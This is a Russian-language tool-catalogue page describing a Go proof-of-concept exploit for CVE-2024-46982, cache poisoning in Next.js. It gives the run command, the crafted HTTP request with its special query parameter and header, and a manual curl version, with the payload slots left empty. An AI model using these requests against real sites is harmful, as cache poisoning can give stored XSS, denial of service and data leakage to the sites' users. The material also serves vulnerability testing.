Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-46982 — POC CVE-2024-46982 | Kitploit
Инструменты/GitHubGitHub/lercas/cve-2024-46982
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасность
GitHublercas/cve-2024-46982

CVE-2024-46982

POC CVE-2024-46982

Репозиторий
5111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт отравления кэша Next.js

Этот инструмент автоматизирует обнаружение и эксплуатацию CVE-2024-46982, уязвимости отравления кэша в Next.js, при которой ответы серверного рендеринга (SSR) могут быть ошибочно закэшированы как статическая генерация сайта (SSG). Такая неправильная конфигурация может привести к хранимым XSS, DoS и утечке данных, позволяя злоумышленникам внедрять вредоносный контент в закэшированные ответы.

Установка и использование

Подготовьте список целей

Создайте файл с именем targets.txt, содержащий по одному целевому URL на строку:

root@kitploit:~
https://vulnerable-site.com
https://another-target.com

Определите пользовательские полезные нагрузки

Создайте файл с именем payloads.txt, содержащий полезные нагрузки, которые будут внедрены через заголовок User-Agent:

root@kitploit:~

Запустите эксплойт

Скачать инструмент

Скомпилируйте и выполните эксплойт с помощью:

root@kitploit:~
go run exploit.go -f targets.txt -p payloads.txt -d 5

Принцип работы

  • Читает список целевых URL из targets.txt
  • Перебирает каждую цель и добавляет уязвимую конечную точку:
root@kitploit:~
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
  • Отправляет несколько запросов, каждый с использованием разной полезной нагрузки из payloads.txt
  • Анализирует HTTP-ответ на признаки успешного внедрения:
    • Если полезная нагрузка появляется в теле ответа → Цель уязвима
    • Если код ответа 200 OK и поведение кэширования ненормальное → Потенциально уязвимо
    • Если код ответа 403 Forbidden или 404 Not Found → Вероятно, исправлено
  • Отображает результаты после тестирования всех целей

Для ручной проверки:

Отправьте вредоносный запрос с помощью curl:

root@kitploit:~
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
     -H "User-Agent: " \
     -H "x-now-route-matches: 1"

Посетите конечную точку в браузере

Требования

  • Go версии 1.21 или новее.